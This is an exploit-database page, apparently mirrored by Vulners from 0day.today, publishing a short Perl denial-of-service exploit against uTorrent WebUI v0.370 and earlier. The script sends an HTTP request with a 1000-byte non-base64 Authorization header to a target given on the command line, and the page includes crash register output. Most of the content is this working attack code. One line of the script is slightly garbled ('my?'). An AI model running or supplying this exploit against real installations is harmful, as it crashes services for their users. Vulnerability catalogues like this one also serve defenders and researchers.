Lucene search
K

uTorrent WebUI <= v0.370 Authorization header DoS Exploit

🗓️ 02 Apr 2010 00:00:00Reported by zombiefxType 
zdt
 zdt
🔗 0day.today👁 18 Views

uTorrent WebUI <= v0.370 Authorization header DoS Exploi

Code
=========================================================
uTorrent WebUI <= v0.370 Authorization header DoS Exploit
=========================================================

# Exploit Title: uTorrent WebUI <= v0.370 Authorization header DoS Exploit
# Author: zombiefx darkernet[at]gmail.com
# Software Link:http://download.utorrent.com/2.0/utorrent.exe
# Version: ?Torrent 2.0 (build 18488) / WebUI <=v0.370
# Tested on: Windows XP SP3
#Code:
#!/usr/bin/perl
# lame usage: ./UTweb.pl
# EAX 00000000 ECX 00000000 EDX 00000001 EBX 003D8360 ASCII "admin" ESP 0141FE94
# EBP 0141FF08 ESI 00000000 EDI 01511958 EIP 0041BC62 uTorrent.0041BC62
# Good luck! corelanc0d3r

use warnings;
use strict;
use IO::Socket;
my $nonbase64 = "\x41" x 1000; # That was pointless
my? $sock = IO::Socket::INET->new(PeerAddr =>$ARGV[0],PeerPort =>$ARGV[1],Proto => 'tcp');
print $sock "GET / HTTP/1.1\r\n".
 "Authorization: Basic $nonbase64\r\n\r\n"; 



#  0day.today [2017-12-31]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation